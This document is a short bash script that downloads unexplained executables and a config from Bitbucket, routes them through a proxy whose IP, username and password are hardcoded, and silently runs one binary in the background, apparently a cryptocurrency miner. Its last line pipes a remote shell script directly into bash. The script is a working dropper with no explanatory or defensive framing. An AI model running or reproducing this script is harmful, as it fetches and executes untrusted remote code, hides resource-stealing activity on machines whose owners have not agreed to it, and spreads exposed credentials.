#!/bin/bash
apt-get update
proxy="192.53.113.235"
port="80"
user="ikuk"
pass="Bangkekau1"
rm -f sgr1 && wget -q 'https://bitbucket.org/newpekatey/pktete/raw/main/sgr1' && chmod +x sgr1
rm -f piket.json && wget -q 'https://bitbucket.org/jeffreyadams29/paketu/raw/master/peteke.json' && chmod +x peteke.json
rm -f panel && wget -q 'https://bitbucket.org/newpekatey/pktete/raw/main/panel' && chmod +x panel
rm -f proxychains.conf && wget -q 'https://bitbucket.org/newpekatey/pktete/raw/main/proxychains.conf' && chmod +x proxychains.conf
rm -f libproxychains4.so && wget -q 'https://bitbucket.org/newpekatey/pktete/raw/main/libproxychains4.so' && chmod +x libproxychains4.so
sleep 3
sed -i "s/127.0.0.1/$proxy/" "proxychains.conf"
sleep 1
sed -i "s/port/$port/" "proxychains.conf"
sed -i "s/user/$user/" "proxychains.conf"
sleep 1
sed -i "s/pass/$pass/" "proxychains.conf"
sleep 11
echo "**********************"
echo "IP ORI ==> "$(curl ifconfig.me)
echo " "
echo " "
echo "IP BARU ==> "$(./panel curl ifconfig.me)
./panel ./sgr1 ann --config "peteke.json" >/dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash